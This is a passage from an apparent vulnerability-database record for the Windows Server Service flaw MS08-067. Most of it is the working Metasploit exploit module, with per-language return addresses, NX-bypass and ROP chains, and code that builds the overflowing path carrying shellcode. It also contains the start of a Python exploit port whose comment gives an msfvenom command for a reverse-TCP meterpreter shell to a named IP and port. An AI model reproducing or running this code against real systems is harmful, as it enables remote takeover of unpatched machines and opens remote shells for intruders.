0x6fe1f807,\n 'DisableNX' => 0x6fe217c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Danish (NX)',\n {\n 'Ret' => 0x5978f807,\n 'DisableNX' => 0x597917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 German (NX)',\n {\n 'Ret' => 0x6fd9f807,\n 'DisableNX' => 0x6fda17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Greek (NX)',\n {\n 'Ret' => 0x592af807,\n 'DisableNX' => 0x592b17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Spanish (NX)',\n {\n 'Ret' => 0x6fdbf807,\n 'DisableNX' => 0x6fdc17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Finnish (NX)',\n {\n 'Ret' => 0x597df807,\n 'DisableNX' => 0x597e17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 French (NX)',\n {\n 'Ret' => 0x595bf807,\n 'DisableNX' => 0x595c17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Hebrew (NX)',\n {\n 'Ret' => 0x5940f807,\n 'DisableNX' => 0x594117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Hungarian (NX)',\n {\n 'Ret' => 0x5970f807,\n 'DisableNX' => 0x597117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Italian (NX)',\n {\n 'Ret' => 0x596bf807,\n 'DisableNX' => 0x596c17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Japanese (NX)',\n {\n 'Ret' => 0x567fd4d2,\n 'DisableNX' => 0x568017c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Korean (NX)',\n {\n 'Ret' => 0x6fd6f807,\n 'DisableNX' => 0x6fd717c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Dutch (NX)',\n {\n 'Ret' => 0x596cf807,\n 'DisableNX' => 0x596d17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Norwegian (NX)',\n {\n 'Ret' => 0x597cf807,\n 'DisableNX' => 0x597d17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Polish (NX)',\n {\n 'Ret' => 0x5941f807,\n 'DisableNX' => 0x594217c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Portuguese - Brazilian (NX)',\n {\n 'Ret' => 0x596ff807,\n 'DisableNX' => 0x597017c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Portuguese (NX)',\n {\n 'Ret' => 0x596bf807,\n 'DisableNX' => 0x596c17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Russian (NX)',\n {\n 'Ret' => 0x6fe1f807,\n 'DisableNX' => 0x6fe217c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Swedish (NX)',\n {\n 'Ret' => 0x597af807,\n 'DisableNX' => 0x597b17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Turkish (NX)',\n {\n 'Ret' => 0x5a78f807,\n 'DisableNX' => 0x5a7917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n #\n # Windows 2003 Targets\n #\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP1 English (NO NX)',\n {\n 'Ret' => 0x71bf21a2,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP1\n ['Windows 2003 SP1 English (NX)',\n {\n 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL\n 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP1 Japanese (NO NX)',\n {\n 'Ret' => 0x71a921a2,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP1 Spanish (NO NX)',\n {\n 'Ret' => 0x71ac21a2,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP1\n ['Windows 2003 SP1 Spanish (NX)',\n {\n 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL\n 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n # Standard return-to-ESI without NX bypass\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP1 French (NO NX)',\n {\n 'Ret' => 0x71ac1c40 ,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP1\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP1 French (NX)',\n {\n 'RetDec' => 0x7CA2568C, # dec ESI, ret @SHELL32.DLL\n 'RetPop' => 0x7CB47CF4, # push ESI, pop EBP, ret 4 @SHELL32.DLL\n 'JmpESP' => 0x7C98FED3, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7C95E413, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP2 English (NO NX)',\n {\n 'Ret' => 0x71bf3969,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n ['Windows 2003 SP2 English (NX)',\n {\n 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP2 German (NO NX)',\n {\n 'Ret' => 0x71a03969,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n ['Windows 2003 SP2 German (NX)',\n {\n 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)\n [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',\n {\n 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK\n 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK\n 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK\n 'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP2 Spanish (NO NX)',\n {\n 'Ret' => 0x71ac3969,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n ['Windows 2003 SP2 Spanish (NX)',\n {\n 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n # Provided by Masashi Fujiwara\n ['Windows 2003 SP2 Japanese (NO NX)',\n {\n 'Ret' => 0x71a91ed2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI WS2HELP.DLL\n # Standard return-to-ESI without NX bypass\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP2 French (NO NX)',\n {\n 'Ret' => 0x71AC2069,\n 'Scratch' => 0x00020408\n }\n ], # CALL ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP2 French (NX)',\n {\n 'RetDec' => 0x7C98BEB8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7CB3E84E, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7C98A01B, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7C95F517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408\n }\n ],\n\n #\n # Missing Targets\n # Key: T=TODO ?=UNKNOWN U=UNRELIABLE\n #\n # [?] Windows Vista SP0 - Not tested yet\n # [?] Windows Vista SP1 - Not tested yet\n #\n ],\n\n 'DisclosureDate' => 'Oct 28 2008'))\n\n register_options(\n [\n OptString.new('SMBPIPE', [true, 'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),\n ])\n end\n\n #\n #\n # *** WINDOWS XP SP2/SP3 TARGETS ***\n #\n #\n # This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX\n # for the process and then returns back to a call ESI instruction. These addresses are different\n # between operating systems, service packs, and language packs, but the steps below can be used to\n # add new targets.\n #\n #\n # If the target system does not have NX/NX, just place a \"call ESI\" return into both the Ret\tand\n # DisableNX elements of the target hash.\n #\n # If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.\n # First obtain the value for the Ret element of the hash with the following command:\n #\n # $ msfpescan -j esi acgenral.dll\n #\n # Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.\n #\n # Next, find the location of the function we use to disable NX. Use the following command:\n #\n # $ msfpescan -r \"\\x6A\\x04\\x8D\\x45\\x08\\x50\\x6A\\x22\\x6A\\xFF\" acgenral.dll\n #\n # This address should be placed into the DisableNX element of the target hash.\n #\n # The Scratch element of 0x00020408 should work on all versions of Windows\n #\n # The actual function we use to disable NX looks like this:\n #\n # push 4\n # lea eax, [ebp+arg_0]\n # push eax\n # push 22h\n # push 0FFFFFFFFh\n # mov [ebp+arg_0], 2\n # call ds:__imp__NtSetInformationProcess@16\n #\n #\n # *** WINDOWS XP NON-NX TARGETS ***\n #\n #\n # Instead of bypassing NX, just return directly to a \"JMP ESI\", which takes us to the short\n # jump, and finally the shellcode.\n #\n #\n # *** WINDOWS 2003 SP2 TARGETS ***\n #\n #\n # There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,\n # both of these are inside NTDLL.DLL and use a return method that is not directly compatible\n # with our call stack. To solve this, Brett Moore figured out a multi-step return call chain\n # that eventually leads to the NX bypass function.\n #\n #\n # *** WINDOWS 2000 TARGETS ***\n #\n #\n # No NX to bypass, just return directly to a \"JMP EDX\", which takes us to the short\n # jump, and finally the shellcode.\n #\n #\n # *** WINDOWS VISTA TARGETS ***\n #\n # Currently untested, will involve ASLR and NX, should be fun.\n #\n #\n # *** NetprPathCanonicalize IDL ***\n #\n #\n # NET_API_STATUS NetprPathCanonicalize(\n # [in, string, unique] SRVSVC_HANDLE ServerName,\n # [in, string] WCHAR* PathName,\n # [out, size_is(OutbufLen)] unsigned char* Outbuf,\n # [in, range(0,64000)] DWORD OutbufLen,\n # [in, string] WCHAR* Prefix,\n # [in, out] DWORD* PathType,\n # [in] DWORD Flags\n # );\n #\n\n def exploit\n begin\n connect\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n if e.message =~ /Connection reset/\n print_error('Connection reset during login')\n print_error('This most likely means a previous exploit attempt caused the service to crash')\n return\n else\n raise e\n end\n end\n\n # Use a copy of the target\n mytarget = target\n\n if target['auto']\n\n mytarget = nil\n\n print_status('Automatically detecting the target...')\n fprint = smb_fingerprint\n\n print_status(\"Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}\")\n\n # Bail early on unknown OS\n if (fprint['os'] == 'Unknown')\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n # Windows 2000 is mostly universal\n if (fprint['os'] == 'Windows 2000')\n mytarget = targets[1]\n end\n\n # Windows XP SP0/SP1 is mostly universal\n if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'\n mytarget = targets[2]\n end\n\n # Windows 2003 SP0 is mostly universal\n if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?\n mytarget = targets[3]\n end\n\n # Windows 2003 R2 is treated the same as 2003\n if (fprint['os'] == 'Windows 2003 R2')\n fprint['os'] = 'Windows 2003'\n end\n\n # Service Pack match must be exact\n if (not mytarget) and fprint['sp'].index('+')\n print_error('Could not determine the exact service pack')\n print_error(\"Auto-targeting failed, use 'show targets' to manually select one\")\n disconnect\n return\n end\n\n # Language Pack match must be exact or we default to English\n if (not mytarget) and fprint['lang'] == 'Unknown'\n print_status('We could not detect the language pack, defaulting to English')\n fprint['lang'] = 'English'\n end\n\n # Normalize the service pack string\n fprint['sp'].gsub!(/Service Pack\\s+/, 'SP')\n\n unless mytarget\n targets.each do |t|\n # Prefer AlwaysOn NX over NX, and NX over non-NX\n if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(AlwaysOn NX\\)/\n mytarget = t\n break\n end\n if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(NX\\)/\n mytarget = t\n break\n end\n end\n end\n\n unless mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n end\n\n #\n # Build the malicious path name\n #\n\n padder = [*('A'..'Z')]\n pad = 'A'\n while pad.length < 7\n c = padder[rand(padder.length)]\n next if pad.index(c)\n pad += c\n end\n\n prefix = '\\\\'\n path = ''\n server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase\n\n #\n # Windows 2003 SP2 (NX) targets\n #\n if mytarget['RetDec']\n\n jumper = Rex::Text.rand_text_alpha(70).upcase\n jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room\n\n jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space\n jumper[ 8, 4] = [mytarget['RetDec']].pack('V')\n jumper[ 12, 4] = [mytarget['RetDec']].pack('V')\n jumper[ 16, 4] = [mytarget['RetDec']].pack('V')\n\n jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP\n jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')\n\n jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')\n jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')\n jumper[ 64, 2] = \"\\xeb\\x02\" # our jump\n jumper[ 68, 2] = \"\\xeb\\x62\" # original\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # Writable memory location (static)\n [mytarget['Scratch']].pack('V') + # EBP\n\n # Return to code which disables NX (or just the return)\n [mytarget['RetDec']].pack('V') +\n\n # Padding with embedded jump\n jumper +\n\n # NULL termination\n \"\\x00\" * 2\n\n #\n # Windows XP SP2/SP3 ROP Stager targets\n #\n elsif mytarget['UseROP']\n\n rop = generate_rop(mytarget['UseROP'])\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # ROP Stager\n rop +\n\n # Padding (skipped)\n Rex::Text.rand_text_alpha(2) +\n\n # NULL termination\n \"\\x00\" * 2\n\n #\n # Windows 2000, XP (NX), and 2003 (NO NX) targets\n #\n else\n\n jumper = Rex::Text.rand_text_alpha(70).upcase\n jumper[ 4, 4] = [mytarget.ret].pack('V')\n jumper[50, 8] = make_nops(8)\n jumper[58, 2] = \"\\xeb\\x62\"\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # Writable memory location (static)\n [mytarget['Scratch']].pack('V') + # EBP\n\n # Return to code which disables NX (or just the return)\n [mytarget['DisableNX'] || mytarget.ret].pack('V') +\n\n # Padding with embedded jump\n jumper +\n\n # NULL termination\n \"\\x00\" * 2\n\n end\n\n handle = dcerpc_handle(\n '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n dcerpc_bind(handle)\n\n stub =\n NDR.uwstring(server) +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(1024)) +\n NDR.wstring(prefix) +\n NDR.long(4097) +\n NDR.long(0)\n\n # NOTE: we don't bother waiting for a response here...\n print_status('Attempting to trigger the vulnerability...')\n dcerpc.call(0x1f, stub, false)\n\n # Cleanup\n handler\n disconnect\n end\n\n def check\n begin\n connect\n smb_login\n rescue Rex::ConnectionError => e\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n if e.message =~ /Connection reset/\n vprint_error('Connection reset during login')\n vprint_error('This most likely means a previous exploit attempt caused the service to crash')\n return Msf::Exploit::CheckCode::Unknown\n else\n raise e\n end\n end\n\n #\n # Build the malicious path name\n # 5b878ae7 \"db @eax;g\"\n prefix = '\\\\'\n path =\n \"\\x00\\\\\\x00/\" * 0x10 +\n Rex::Text.to_unicode('\\\\') +\n Rex::Text.to_unicode('R7') +\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n Rex::Text.to_unicode('R7') +\n \"\\x00\" * 2\n\n server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase\n\n handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n begin\n # Samba doesn't have this handle and returns an ErrorCode\n dcerpc_bind(handle)\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"SMB error: #{e.message}\")\n return Msf::Exploit::CheckCode::Safe\n end\n\n vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)\n\n stub =\n NDR.uwstring(server) +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(8) +\n NDR.wstring(prefix) +\n NDR.long(4097) +\n NDR.long(0)\n\n resp = dcerpc.call(0x1f, stub)\n error = resp[4, 4].unpack('V')[0]\n\n # Cleanup\n simple.client.close\n simple.client.tree_disconnect\n disconnect\n\n if (error == 0x0052005c) # \\R :)\n return Msf::Exploit::CheckCode::Vulnerable\n else\n vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error\n return Msf::Exploit::CheckCode::Safe\n end\n end\n\n def generate_rop(version)\n free_byte = \"\\x90\"\n # free_byte = \"\\xcc\"\n\n # create a few small gadgets\n # <free byte>; pop edx; pop ecx; ret\n gadget1 = free_byte + \"\\x5a\\x59\\xc3\"\n # mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd\n gadget2 = free_byte + \"\\x89\\xc7\" + \"\\x83\\xc7\\x0c\" + \"\\x6a\\x7f\" + \"\\x59\" + \"\\xf2\\xa5\" + free_byte\n # <must complete \\x00 two byte opcode>; <free_byte>; jmp $+0x5c\n gadget3 = \"\\xcc\" + free_byte + \"\\xeb\\x5a\"\n\n # gadget2:\n # get eax into edi\n # adjust edi\n # get 0x7f in ecx\n # copy the data\n # jmp to it\n #\n dws = gadget2.unpack('V*')\n\n ##\n # Create the ROP stager, pfew.. Props to corelanc0d3r!\n # This was no easy task due to space limitations :-/\n # -jduck\n ##\n module_name = 'ACGENRAL.DLL'\n module_base = 0x6f880000\n\n rvasets = {}\n # XP SP2\n rvasets['5.1.2600.2180'] = {\n # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret\n 'call_HeapCreate' => 0x21064,\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,\n 'pop ecx / ret' => 0x2e546 + 6,\n 'mov [eax], ecx / ret' => 0xd182,\n 'jmp eax' => 0x19b85,\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,\n 'mov [eax+0x10], ecx / ret' => 0x10976 + 6,\n 'add eax, 8 / ret' => 0x29a14\n }\n\n # XP SP3\n rvasets['5.1.2600.5512'] = {\n # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret\n 'call_HeapCreate' => 0x21286,\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,\n 'pop ecx / ret' => 0x2e796 + 6,\n 'mov [eax], ecx / ret' => 0xd296,\n 'jmp eax' => 0x19c6f,\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,\n 'mov [eax+0x10], ecx / ret' => 0x10a56 + 6,\n 'add eax, 8 / ret' => 0x29c64\n }\n\n # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180\n rop = [\n # prime ebp (adjustment distance)\n 0x00018000,\n\n # get some RWX memory via HeapCreate\n 'call_HeapCreate',\n 0x01040110, # flOptions (gets & with 0x40005)\n 0x01010101,\n 0x01010101,\n\n # adjust the returned pointer\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret',\n\n # setup gadget1\n 'pop ecx / ret',\n gadget1.unpack('V').first,\n 'mov [eax], ecx / ret',\n\n # execute gadget1\n 'jmp eax',\n\n # setup gadget2 (via gadget1)\n dws[0],\n dws[1],\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',\n\n # setup part3 of gadget2\n 'pop ecx / ret',\n dws[2],\n 'mov [eax+0x10], ecx / ret',\n\n # execute gadget2\n 'add eax, 8 / ret',\n 'jmp eax',\n\n # gadget3 gets executed after gadget2 (luckily)\n gadget3.unpack('V').first\n ]\n\n # convert the meta rop into concrete bytes\n rvas = rvasets[version]\n\n rop.map! { |e|\n if e.kind_of? String\n # Meta-replace (RVA)\n fail_with(Failure::BadConfig, \"Unable to locate key: \\\"#{e}\\\"\") unless rvas[e]\n module_base + rvas[e]\n\n elsif e == :unused\n # Randomize\n rand_text(4).unpack('V').first\n\n else\n # Literal\n e\n end\n }\n\n ret = rop.pack('V*')\n\n # check badchars?\n # idx = Rex::Text.badchar_index(ret, payload_badchars)\n\n ret\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms08_067_netapi.rb"}], "huawei": [{"lastseen": "2019-02-01T18:01:13", "bulletinFamily": "software", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "HUAWEI-SA-20171129-01-WINDOWS", "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171129-01-windows-en", "title": "Security Advisory - Remote Code Execution Vulnerability in Microsoft Windows Server Service", "type": "huawei", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-08T11:43:17", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "1337DAY-ID-25383", "href": "https://0day.today/exploit/description/25383", "type": "zdt", "title": "Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067) Exploit", "sourceData": "# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS08_067.py\r\n \r\nimport struct\r\nimport time\r\nimport sys\r\n \r\n \r\n \r\nfrom threading import Thread #Thread is imported incase you would like to modify\r\n \r\n \r\n \r\n \r\n \r\ntry:\r\n \r\n from impacket import smb\r\n \r\n from impacket import uuid\r\n \r\n from impacket.dcerpc import dcerpc\r\n \r\n from impacket.dcerpc import transport\r\n \r\nexcept ImportError, _:\r\n \r\n print 'Install the following library to make this script work'\r\n \r\n print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'\r\n \r\n print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'\r\n \r\n sys.exit(1)\r\n \r\n \r\n \r\n \r\n \r\nprint '#######################################################################'\r\n \r\nprint '# MS08-067 Exploit'\r\n \r\nprint '# This is a modified verion of Debasis Mohanty\\'s code (https://www.exploit-db.com/exploits/7132/). \r\n \r\nprint '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'\r\n \r\nprint '#######################################################################\\n'\r\n \r\n \r\n \r\n \r\n \r\n#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40; \r\n#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)\r\n#EXITFUNC=thread Important!\r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\" -f python\r\nshellcode=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode+=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode += 